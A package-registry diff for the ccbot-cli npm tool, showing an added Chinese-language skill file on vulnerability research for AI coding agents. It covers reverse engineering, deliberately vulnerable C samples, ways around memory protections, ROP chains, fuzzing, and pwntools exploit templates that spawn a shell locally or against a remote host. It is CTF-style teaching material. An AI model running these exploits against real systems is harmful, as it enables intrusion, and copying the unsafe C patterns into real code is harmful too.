ccbot-cli 2.0.1 → 2.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (83) hide show
  1. package/LICENSE +21 -0
  2. package/bin/adapters/claude.js +150 -0
  3. package/bin/adapters/codex.js +439 -0
  4. package/bin/install.js +509 -349
  5. package/bin/lib/ccline.js +82 -0
  6. package/bin/lib/utils.js +87 -34
  7. package/bin/uninstall.js +48 -0
  8. package/config/AGENTS.md +630 -0
  9. package/config/CLAUDE.md +229 -20
  10. package/config/ccline/config.toml +161 -0
  11. package/config/codex-config.example.toml +22 -0
  12. package/config/settings.example.json +32 -0
  13. package/output-styles/abyss-cultivator.md +399 -0
  14. package/package.json +14 -5
  15. package/skills/SKILL.md +159 -0
  16. package/skills/domains/ai/SKILL.md +34 -0
  17. package/skills/domains/ai/agent-dev.md +242 -0
  18. package/skills/domains/ai/llm-security.md +288 -0
  19. package/skills/domains/ai/prompt-and-eval.md +279 -0
  20. package/skills/domains/ai/rag-system.md +542 -0
  21. package/skills/domains/architecture/SKILL.md +42 -0
  22. package/skills/domains/architecture/api-design.md +225 -0
  23. package/skills/domains/architecture/caching.md +299 -0
  24. package/skills/domains/architecture/cloud-native.md +285 -0
  25. package/skills/domains/architecture/message-queue.md +329 -0
  26. package/skills/domains/architecture/security-arch.md +297 -0
  27. package/skills/domains/data-engineering/SKILL.md +207 -0
  28. package/skills/domains/development/SKILL.md +46 -0
  29. package/skills/domains/development/cpp.md +246 -0
  30. package/skills/domains/development/go.md +323 -0
  31. package/skills/domains/development/java.md +277 -0
  32. package/skills/domains/development/python.md +288 -0
  33. package/skills/domains/development/rust.md +313 -0
  34. package/skills/domains/development/shell.md +313 -0
  35. package/skills/domains/development/typescript.md +277 -0
  36. package/skills/domains/devops/SKILL.md +39 -0
  37. package/skills/domains/devops/cost-optimization.md +272 -0
  38. package/skills/domains/devops/database.md +217 -0
  39. package/skills/domains/devops/devsecops.md +198 -0
  40. package/skills/domains/devops/git-workflow.md +181 -0
  41. package/skills/domains/devops/observability.md +280 -0
  42. package/skills/domains/devops/performance.md +336 -0
  43. package/skills/domains/devops/testing.md +283 -0
  44. package/skills/domains/frontend-design/SKILL.md +38 -0
  45. package/skills/domains/frontend-design/claymorphism/SKILL.md +119 -0
  46. package/skills/domains/frontend-design/claymorphism/references/tokens.css +52 -0
  47. package/skills/domains/frontend-design/component-patterns.md +202 -0
  48. package/skills/domains/frontend-design/engineering.md +287 -0
  49. package/skills/domains/frontend-design/glassmorphism/SKILL.md +140 -0
  50. package/skills/domains/frontend-design/glassmorphism/references/tokens.css +32 -0
  51. package/skills/domains/frontend-design/liquid-glass/SKILL.md +137 -0
  52. package/skills/domains/frontend-design/liquid-glass/references/tokens.css +81 -0
  53. package/skills/domains/frontend-design/neubrutalism/SKILL.md +143 -0
  54. package/skills/domains/frontend-design/neubrutalism/references/tokens.css +44 -0
  55. package/skills/domains/frontend-design/state-management.md +680 -0
  56. package/skills/domains/frontend-design/ui-aesthetics.md +110 -0
  57. package/skills/domains/frontend-design/ux-principles.md +156 -0
  58. package/skills/domains/infrastructure/SKILL.md +200 -0
  59. package/skills/domains/mobile/SKILL.md +224 -0
  60. package/skills/domains/orchestration/SKILL.md +29 -0
  61. package/skills/domains/orchestration/multi-agent.md +263 -0
  62. package/skills/domains/security/SKILL.md +54 -0
  63. package/skills/domains/security/blue-team.md +436 -0
  64. package/skills/domains/security/code-audit.md +265 -0
  65. package/skills/domains/security/pentest.md +226 -0
  66. package/skills/domains/security/red-team.md +375 -0
  67. package/skills/domains/security/threat-intel.md +372 -0
  68. package/skills/domains/security/vuln-research.md +369 -0
  69. package/skills/orchestration/multi-agent/SKILL.md +493 -0
  70. package/skills/run_skill.js +129 -0
  71. package/skills/tools/gen-docs/SKILL.md +116 -0
  72. package/skills/tools/gen-docs/scripts/doc_generator.js +435 -0
  73. package/skills/tools/lib/shared.js +98 -0
  74. package/skills/tools/verify-change/SKILL.md +140 -0
  75. package/skills/tools/verify-change/scripts/change_analyzer.js +289 -0
  76. package/skills/tools/verify-module/SKILL.md +127 -0
  77. package/skills/tools/verify-module/scripts/module_scanner.js +171 -0
  78. package/skills/tools/verify-quality/SKILL.md +160 -0
  79. package/skills/tools/verify-quality/scripts/quality_checker.js +337 -0
  80. package/skills/tools/verify-security/SKILL.md +143 -0
  81. package/skills/tools/verify-security/scripts/security_scanner.js +283 -0
  82. package/bin/lib/registry.js +0 -61
  83. package/config/.claudeignore +0 -11
@@ -0,0 +1,369 @@
1
+ ---
2
+ name: vuln-research
3
+ description: 漏洞研究。二进制分析、逆向工程、Exploit开发、Fuzzing。当用户提到漏洞研究、二进制、逆向、Exploit、Fuzzing、PWN、栈溢出、堆溢出时使用。
4
+ ---
5
+
6
+ # 🔥 赤焰秘典 · 漏洞研究 (Vulnerability Research)
7
+
8
+
9
+ ## 研究流程
10
+
11
+ ```
12
+ 目标分析 → 逆向工程 → 漏洞发现 → Exploit开发 → 报告/披露
13
+ │ │ │ │ │
14
+ └─ 架构 ────┴─ IDA ─────┴─ Fuzz ────┴─ PoC ────┴─ CVE
15
+ ```
16
+
17
+ ## 逆向工程
18
+
19
+ ### 静态分析
20
+ ```bash
21
+ # 文件信息
22
+ file binary
23
+ strings binary | grep -i password
24
+ readelf -h binary
25
+ objdump -d binary
26
+
27
+ # IDA Pro / Ghidra
28
+ # 反汇编、反编译、交叉引用分析
29
+ ```
30
+
31
+ ### 动态分析
32
+ ```bash
33
+ # GDB 调试
34
+ gdb ./binary
35
+ (gdb) break main
36
+ (gdb) run
37
+ (gdb) disas
38
+ (gdb) x/20x $esp
39
+ (gdb) info registers
40
+
41
+ # strace/ltrace
42
+ strace ./binary
43
+ ltrace ./binary
44
+
45
+ # GDB 增强
46
+ # pwndbg / GEF / peda
47
+ ```
48
+
49
+ ### 常用工具
50
+ ```yaml
51
+ 反汇编/反编译:
52
+ - IDA Pro: 商业,最强大
53
+ - Ghidra: 开源,NSA出品
54
+ - Binary Ninja: 现代化
55
+ - Radare2: 开源命令行
56
+
57
+ 调试器:
58
+ - GDB + pwndbg/GEF
59
+ - x64dbg (Windows)
60
+ - WinDbg (Windows内核)
61
+ - LLDB (macOS)
62
+
63
+ 辅助工具:
64
+ - ROPgadget: ROP链构造
65
+ - one_gadget: libc gadget
66
+ - patchelf: ELF修改
67
+ - checksec: 安全机制检查
68
+ ```
69
+
70
+ ## 漏洞类型
71
+
72
+ ### 栈溢出
73
+ ```c
74
+ // 漏洞代码
75
+ void vulnerable(char *input) {
76
+ char buffer[64];
77
+ strcpy(buffer, input); // 无边界检查
78
+ }
79
+
80
+ // 利用思路
81
+ // 1. 覆盖返回地址
82
+ // 2. 跳转到 shellcode 或 ROP 链
83
+ ```
84
+
85
+ ```python
86
+ # Exploit 模板
87
+ from pwn import *
88
+
89
+ context.arch = 'amd64'
90
+ p = process('./vuln')
91
+
92
+ # 构造 payload
93
+ padding = b'A' * 72 # 填充到返回地址
94
+ ret_addr = p64(0x401234) # 目标地址
95
+
96
+ payload = padding + ret_addr
97
+ p.sendline(payload)
98
+ p.interactive()
99
+ ```
100
+
101
+ ### 堆溢出
102
+ ```c
103
+ // 漏洞代码
104
+ struct chunk {
105
+ char data[32];
106
+ void (*func_ptr)();
107
+ };
108
+
109
+ void vulnerable(char *input) {
110
+ struct chunk *c = malloc(sizeof(struct chunk));
111
+ strcpy(c->data, input); // 溢出覆盖 func_ptr
112
+ c->func_ptr();
113
+ }
114
+ ```
115
+
116
+ ### Use-After-Free
117
+ ```c
118
+ // 漏洞代码
119
+ void vulnerable() {
120
+ char *ptr = malloc(64);
121
+ free(ptr);
122
+ // ptr 未置空
123
+ strcpy(ptr, user_input); // UAF
124
+ }
125
+ ```
126
+
127
+ ### 格式化字符串
128
+ ```c
129
+ // 漏洞代码
130
+ void vulnerable(char *input) {
131
+ printf(input); // 格式化字符串漏洞
132
+ }
133
+
134
+ // 利用
135
+ // %x - 泄露栈数据
136
+ // %n - 任意写
137
+ // %s - 任意读
138
+ ```
139
+
140
+ ## 保护机制绕过
141
+
142
+ ### 检查保护
143
+ ```bash
144
+ checksec ./binary
145
+ # RELRO, Stack Canary, NX, PIE, FORTIFY
146
+ ```
147
+
148
+ ### 绕过技术
149
+ ```yaml
150
+ NX (不可执行):
151
+ - ROP (Return Oriented Programming)
152
+ - ret2libc
153
+ - ret2syscall
154
+
155
+ ASLR (地址随机化):
156
+ - 信息泄露
157
+ - 暴力破解 (32位)
158
+ - 部分覆盖
159
+
160
+ Stack Canary:
161
+ - 信息泄露
162
+ - 逐字节爆破
163
+ - 覆盖 __stack_chk_fail
164
+
165
+ PIE (位置无关):
166
+ - 信息泄露基址
167
+ - 部分覆盖
168
+
169
+ RELRO:
170
+ - Partial: 覆盖 GOT
171
+ - Full: 其他利用方式
172
+ ```
173
+
174
+ ### ROP 链构造
175
+ ```python
176
+ from pwn import *
177
+
178
+ elf = ELF('./vuln')
179
+ libc = ELF('./libc.so.6')
180
+ rop = ROP(elf)
181
+
182
+ # 泄露 libc 地址
183
+ rop.puts(elf.got['puts'])
184
+ rop.main()
185
+
186
+ # 计算 libc 基址
187
+ libc_base = leaked_puts - libc.symbols['puts']
188
+ system = libc_base + libc.symbols['system']
189
+ bin_sh = libc_base + next(libc.search(b'/bin/sh'))
190
+
191
+ # 第二阶段 ROP
192
+ rop2 = ROP(libc)
193
+ rop2.system(bin_sh)
194
+ ```
195
+
196
+ ## Fuzzing
197
+
198
+ ### AFL++
199
+ ```bash
200
+ # 编译插桩
201
+ afl-gcc -o target_afl target.c
202
+
203
+ # 准备种子
204
+ mkdir input output
205
+ echo "seed" > input/seed
206
+
207
+ # 开始 Fuzz
208
+ afl-fuzz -i input -o output -- ./target_afl @@
209
+
210
+ # 分析崩溃
211
+ afl-tmin -i output/crashes/id:000000 -o minimized -- ./target_afl @@
212
+ ```
213
+
214
+ ### LibFuzzer
215
+ ```cpp
216
+ // fuzz_target.cpp
217
+ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
218
+ // 调用被测函数
219
+ parse_input(data, size);
220
+ return 0;
221
+ }
222
+ ```
223
+
224
+ ```bash
225
+ # 编译
226
+ clang++ -fsanitize=fuzzer,address fuzz_target.cpp -o fuzzer
227
+
228
+ # 运行
229
+ ./fuzzer corpus/
230
+ ```
231
+
232
+ ### 智能 Fuzzing
233
+ ```python
234
+ # 基于覆盖率的 Fuzzing
235
+ # 使用 AFL、LibFuzzer 等
236
+
237
+ # 基于语法的 Fuzzing
238
+ # 使用 Peach、Domato 等
239
+
240
+ # 符号执行辅助
241
+ # 使用 KLEE、angr 等
242
+ ```
243
+
244
+ ## Exploit 开发
245
+
246
+ ### Shellcode
247
+ ```python
248
+ # pwntools 生成
249
+ from pwn import *
250
+ context.arch = 'amd64'
251
+
252
+ # execve("/bin/sh", NULL, NULL)
253
+ shellcode = asm(shellcraft.sh())
254
+
255
+ # 自定义 shellcode
256
+ shellcode = asm('''
257
+ xor rdi, rdi
258
+ push rdi
259
+ mov rdi, 0x68732f6e69622f
260
+ push rdi
261
+ mov rdi, rsp
262
+ xor rsi, rsi
263
+ xor rdx, rdx
264
+ mov al, 59
265
+ syscall
266
+ ''')
267
+ ```
268
+
269
+ ### 完整 Exploit 模板
270
+ ```python
271
+ #!/usr/bin/env python3
272
+ from pwn import *
273
+
274
+ context.arch = 'amd64'
275
+ context.log_level = 'debug'
276
+
277
+ # 配置
278
+ binary = './vuln'
279
+ libc_path = './libc.so.6'
280
+ host, port = 'target.com', 1337
281
+
282
+ # 加载
283
+ elf = ELF(binary)
284
+ libc = ELF(libc_path)
285
+
286
+ def exploit(p):
287
+ # 1. 泄露地址
288
+ payload1 = b'A' * 72
289
+ payload1 += p64(elf.plt['puts'])
290
+ payload1 += p64(elf.got['puts'])
291
+ payload1 += p64(elf.symbols['main'])
292
+
293
+ p.sendline(payload1)
294
+ leaked = u64(p.recvline().strip().ljust(8, b'\x00'))
295
+ libc_base = leaked - libc.symbols['puts']
296
+ log.success(f"libc base: {hex(libc_base)}")
297
+
298
+ # 2. 获取 shell
299
+ system = libc_base + libc.symbols['system']
300
+ bin_sh = libc_base + next(libc.search(b'/bin/sh'))
301
+
302
+ payload2 = b'A' * 72
303
+ payload2 += p64(libc_base + 0x4f3d5) # one_gadget
304
+
305
+ p.sendline(payload2)
306
+ p.interactive()
307
+
308
+ if __name__ == '__main__':
309
+ if args.REMOTE:
310
+ p = remote(host, port)
311
+ else:
312
+ p = process(binary)
313
+ exploit(p)
314
+ ```
315
+
316
+ ## CTF PWN 技巧
317
+
318
+ ### 常见题型
319
+ ```yaml
320
+ 栈溢出:
321
+ - ret2text: 跳转到后门函数
322
+ - ret2shellcode: 跳转到 shellcode
323
+ - ret2libc: 调用 system("/bin/sh")
324
+ - ROP: 构造 ROP 链
325
+
326
+ 堆利用:
327
+ - fastbin attack
328
+ - unsorted bin attack
329
+ - tcache poisoning
330
+ - house of 系列
331
+
332
+ 格式化字符串:
333
+ - 泄露栈/libc地址
334
+ - 任意写 GOT
335
+ - 修改返回地址
336
+ ```
337
+
338
+ ### 快速解题流程
339
+ ```bash
340
+ # 1. 检查保护
341
+ checksec ./pwn
342
+
343
+ # 2. 运行测试
344
+ ./pwn
345
+
346
+ # 3. 反编译分析
347
+ # IDA/Ghidra
348
+
349
+ # 4. 确定漏洞点
350
+ # 5. 编写 Exploit
351
+ # 6. 本地测试
352
+ # 7. 远程利用
353
+ ```
354
+
355
+ ## 工具清单
356
+
357
+ | 工具 | 用途 |
358
+ |------|------|
359
+ | IDA Pro | 反汇编/反编译 |
360
+ | Ghidra | 开源逆向 |
361
+ | pwntools | Exploit 开发 |
362
+ | GDB + pwndbg | 调试 |
363
+ | AFL++ | Fuzzing |
364
+ | ROPgadget | ROP 链 |
365
+ | one_gadget | libc gadget |
366
+ | angr | 符号执行 |
367
+
368
+ ---
369
+